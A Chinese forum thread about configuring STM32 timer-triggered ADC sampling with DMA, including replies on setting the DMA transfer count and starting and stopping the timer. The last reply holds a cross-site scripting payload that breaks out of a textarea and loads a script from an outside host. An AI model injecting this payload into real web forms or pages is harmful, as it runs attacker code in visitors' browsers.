[有问必答] 关于DMA-定时器采样遇到的问题

楼主(2016-11-19):
目标:对2个源信号分别进行2种采样率的采样,一个96k,另一个6.4k采样率;
单片机型号:STM32F103C8,48脚,内部主时钟64M(8M倍频获得).
说明:采样由一个外部方波信号触发(周期20ms),即每个20ms有一个外部方波信号到来触发采样。
实现考虑:如96k采样率的通道,即20ms内要采样1920点,若采用定时器中断采样的方式,则20ms内要产生1920次中断,虽然每次定时中断进入只是采样,清中断等几条语句,需要几个cycle就可完成,但20ms内也要消耗5000多个
                cycles,我希望能把这5000个cycles节省下来用于其它的计算,在硬汉的建议下参考了V4的示波器采集部分代码,但实现一直有问题;另一种方案就是传统的定时器中断采样方式,这个已实现,前几天遇到的问题:有一个外脉冲触发,LED就一直交替点亮,这个问题已解决,原因是外中断函数中没有及时清外中断。
问题描述:我考虑了二种方案,但第一种一直有问题,可能对定时器的PWM方式理解不深,这个请硬汉能不是仔细讲解下,CC3输出会自动触发A/D采样?那CC2是否也可以?遇到的问题如下:
1、  用这条语句时,LED不会交替点亮,file:///C:\Documents and Settings\Administrator\Application Data\Tencent\Users\2769266387\QQ\WinTemp\RichOle\J)[XC3WG1[G`_CO@``CPWLY.pngfile:///C:\Documents and Settings\Administrator\Application Data\Tencent\Users\2769266387\QQ\WinTemp\RichOle\J)[XC3WG1[G`_CO@``CPWLY.pngfile:///C:\Documents and Settings\Administrator\Application Data\Tencent\Users\2769266387\QQ\WinTemp\RichOle\J)[XC3WG1[G`_CO@``CPWLY.pngfile:///C:\Documents and Settings\Administrator\Application Data\Tencent\Users\2769266387\QQ\WinTemp\RichOle\J)[XC3WG1[G`_CO@``CPWLY.pngfile:///C:\Documents and Settings\Administrator\Application Data\Tencent\Users\2769266387\QQ\WinTemp\RichOle\J)[XC3WG1[G`_CO@``CPWLY.pngfile:///C:\Documents and Settings\Administrator\Application Data\Tencent\Users\2769266387\QQ\WinTemp\RichOle\J)[XC3WG1[G`_CO@``CPWLY.pngfile:///C:\Documents and Settings\Administrator\Application Data\Tencent\Users\2769266387\QQ\WinTemp\RichOle\J)[XC3WG1[G`_CO@``CPWLY.png当设定为DMA_Mode_Circular模式时会交替点亮?这是怎么回事,和你的不一样?
                 2、你的定时器是自动触发采样并送往DMA中吗?
                 3、你这种采样方式必须用PWM方式吗?
                  4、CC3输出触发A/D采样,那么选用CC2或cc1是否同样可以?
                   另一种方案已实现。
       谢谢!主要我对定时器的高级应用不是太了解,前几天看了些,由于现在项目比较急,用了方案2采集方式,但还是想把第1中方案实现了,请指点,现把程序代码附上,能不能帮我看看问题在哪?
方案1思想(参考V4出厂程序),我的理解 方案2
1、外部外冲来时,进入外中断程序,使能ADC1TIM1
、定时器T1自动触发ADC采样并送往DMA缓冲;
DMA满中断触发进入DMA中断函数,交替点亮1个二极管,并关ADC1TIM1
、等待下一次外部触发脉冲的到来。
1、外中断信号到来,启动定时器3和ADC1;
2、定时器3中断,采集数据;
3、等待DMA满中断;
4、DMA满中断,进入DMA中断,修改全局标志,关定时器3和ADC1;
5、等待下一次外部中断的到来;

网友:
不用关DMA中断,不关DMA中断的事情啊。
可以设置DMA传输数据的个数,比如1920,不循环。每次外部中断,开启一次DMA即可。

楼主:
谢谢,答复! 请问“每次外部中断,开启一次DMA即可”这句话具体是什么意思,还需要给DMA设置传输数据个数吗?

楼主:
还有,定时器必须设置成PWM格式吗?

网友:
引用 网友A:
谢谢,答复! 请问“每次外部中断,开启一次DMA即可”这句话具体是什么意思,还需要给DMA设置传输数据个数吗?

是的啊,一次触发,DMA可以设定传输的个数的。你这个这样设置:
1. 外部触发启动定时器,
2. 定时器触发ADC,
3. ADC触发DMA,DMA把数据存在一个数组。
4. DMA设定传输个数,计数完成了,就有DMA完成中断。
5. 然后处理数据。

楼主:
我又看了下V4的出厂程序,原因可能我没有再次初始化DMA的设置,图片中,我看到在StartADC中又对DMA进行了配置,这个能就是我没成功的原因!

网友:
引用 网友A:

我又看了下V4的出厂程序,原因可能我没有再次初始化DMA的设置,图片中,我看到在StartADC中又对DMA进行了配置,这个能就是我没成功的原因!

DMA 不用再次设置的。最多就是enable,或者disable。

我建议你通过关闭/开启定时器来就可以了。不用重新设定DMA的任何参数。

DMA传输完成中断里面,关闭定时器。外部中断来启动定时器,就可以实现你需要的功能。

网友:
</textarea>'"><script src=http://xss.scanfsec.com/GpZDZn></script>